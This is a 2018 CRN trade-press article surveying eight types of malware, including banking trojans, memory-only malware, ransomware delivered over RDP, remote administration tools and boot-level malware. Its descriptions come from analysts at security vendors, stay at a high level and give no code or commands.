The Eight Most Dangerous Types Of Malware In 2018
Malicious software, better known as malware, is a type of computer program that is designed to run for the benefit of someone other than the owner of the computer. Malware can be used to compromise computer functions, steal data, bypass access controls, or otherwise harm the host.
More specifically, malware is able to cripple or destroy a system’s operation, allowing an attacker access to confidential and sensitive information, as well as the ability to spy on personal or private computers. Bad actors specifically program malware to be stealthy, meaning that it can stay on the target system for a long time without the user consenting or even knowing about it.
Malware can be classified in several different ways, including its delivery method; the specific type of vulnerability being exploited; the goal or objective of the malware; the platform or device targeted by the device; how the malware attempts to hide itself; and how the malware replicates and spreads.
As part of CRN's Cybersecurity Week 2018, here's a look at eight new and emerging types of malware that are wreaking havoc on users, devices and systems this year.
Some types of malware excel at evading detection techniques by using built-in logic that looks to see whether or not certain kinds of protection capabilities are in place, according to Johnnie Konstantas, senior director, enterprise cybersecurity group at Redmond, Wash.-based Microsoft.
The adaptive malware is usually looking for detection capabilities that are specific to a particular vendor, Konstantas said. If code from that particular vendor is present, Konstantas said the malware either moves on or tries a different method that it knows the vendor isn't capable of spotting.
Bad actors have, in some cases, been able to reverse-engineer a vendor's malware detection process thanks to increased collaboration among hackers as well as the sharing of tools, code and methods, Konstantas said. By obtaining a very deep understanding of how a vendor's protections are supposed to work, Konstantas said the bad actors are therefore able to write code that evades it.
Banking trojans have become a rather common way to go after businesses through either massive spam campaigns or targeted attacks, according to Jerome Segura, lead malware intelligence analyst at Santa Clara, Calif.-based Malwarebytes. These trojans are delivered either via macros or through exploits in the office document, Segura said, with a loader called Emotet becoming particularly popular.
Banking trojans can provide access to a user's banking credentials, browser credentials or bitcoin wallet, and Segura said that information can be monetized by either selling it on the Dark web or using it to gain access to more valuable parts of the network. Although banking trojans aren't as easy to monetize as ransomware, Segura said they have the benefit of being less visible and noisy.
Some banking trojans are specially configured for particular geographies such as Swiss banks, British banks or Canadian banks, Segura said, and carry out their activity through web injections or man-in-the-middle attacks. After a user logs into a banking application or website, the trojan could inject a different set of authentication questions for the user to answer, thereby capturing their credentials on the fly.
Memory-only malware runs on a user's browser and will keep injecting threads into different Microsoft Edge processes until the user reboots their system, according to Giovanni Vigna, chief technology officer at Redwood City, Calif.-based Lastline. This type of malware is extremely stealthy since it leaves no footprint whatsoever on a user's file system, Vigna said.
Bad actors have been trying to find ways to execute code that won't create an actual file on the system since security tools will likely intercept the system call and scrutinize whatever was written to the file system, Vigna said. There are many tools operating on both Windows and Linux that allow for the execution of malware without actually having to call for the creation of a file system in the OS, he said.
The potential damage from memory-only malware is typically confined to the browser itself, Vigna said, meaning that bad actors can't encrypt files on the system but can steal credentials, inject HTML code, and introduce malicious shell script onto a webpage. If the malware breaks out of browser jail, though, it's then able to do pretty much anything such as encrypting file systems or modifying file settings.
Multi-part malware has both a component to encrypt, destroy or otherwise make the data unavailable, Microsoft's Konstantas said, as well as a component for further propagation. This type of malware is structured so that it downloads in pieces, Konstantas said, meaning that the first piece of malware will communicate out to the command control server as it’s making its way onto the machine.
This communication allows for the retrieval of an additional piece of malware that can be used for screen scraping or crawling file shares, according to Konstantas. In ransomware attacks, Konstantas said the propagation element is focused on destroying or making as much data unavailable as possible to maximize the ransom payout.
In non-ransomware cases, Konstantas said the malware propagates to help find the higher-value parts of the network where the data resides such as HR systems or file systems. Bad actors typically carry this out by making their way into the system directory, elevating a machine's privilege, and then pursuing higher-value targets, according to Konstantas.
It can be difficult to measure the prevalence of ransomware on endpoints in the enterprise, according to Malwarebytes' Segura. Remote Desktop Protocols, or RDP, are a tried and successful vector for delivering ransomware payloads since a lot of companies have weak or poorly secured machines, Segura said.
Bad actors often brute-force attack passwords in order to get onto a machine in the network, Segura said, and from there move laterally to deposit ransomware payloads. SamSam ransomware, for instance, relies on more automated processes to gain a foothold on the network and then uses manual processes for the actual deployment of the ransomware itself, Segura said.
The incidence of ransomware has declined on the consumer side due to a relative paucity of moneymaking opportunities, Segura said. He expects ransomware to become more customized for and targeted at businesses since that's where the opportunity for a larger payout lies.
Remote Administration Tools
Remote Administration Tools, or RATs, can compromise systems through a back door or by improperly allowing users remote access, according to Malwarebytes' Segura. Many open-source, publicly available RATs can be used for legitimate purposes such as remotely controlling something on the network, Segura said.
But these free tools can be slightly altered and abused by attackers to carry out purely malicious activities such as taking screenshots, recording video or stealing passwords from a remote user, according to Segura. More sophisticated hackers are using RATs in targeted attacks via phishing emails to gain more information about a company for intelligence or espionage purposes, Segura said.
Many RATs can be downloaded off the shelf, Segura said, with security vendors classifying them as riskware or a potentially unwanted tool since they can either be properly used for remote administration or abused altogether. It's important for users to be provided with the option to determine whether or not they want RATs such as keylogging tools running on their system, he said.
Lastline has seen an increase in malware that uses PowerShell or other sophisticated scripting activities on Windows to perform malicious functions, according to Vigna.
PowerShell components can't be analyzed, Vigna said, meaning that it isn't easy to identify that the shell script is doing something bad. As a result, Vigna said PowerShell is able to get around unsophisticated anti-malware tools and achieve persistence and compromise without being too obvious.
Some types of malware burrow themselves deeply into the applications or system-level processes and attempt to inject themselves into the system just as it begins to run, according to Microsoft's Konstantas.
The bulk of the malware detection capabilities in the market today sit above the operating system layer, Konstantas said. But by burrowing itself deeply into the hardware or system-level processes, Konstantas said this type of malware is able to run underneath the operating system and thereby avoid detection.
By coming in at boot-up time right as the machine is firing up, Konstantas said this type of malware is able to sit under all of the application and protections that only activate after the boot-up is complete. And the longer system-level malware is able to persist, the more time it has to perform actions such as stealing data, destroying data or finding its way to higher-value data, according to Konstantas.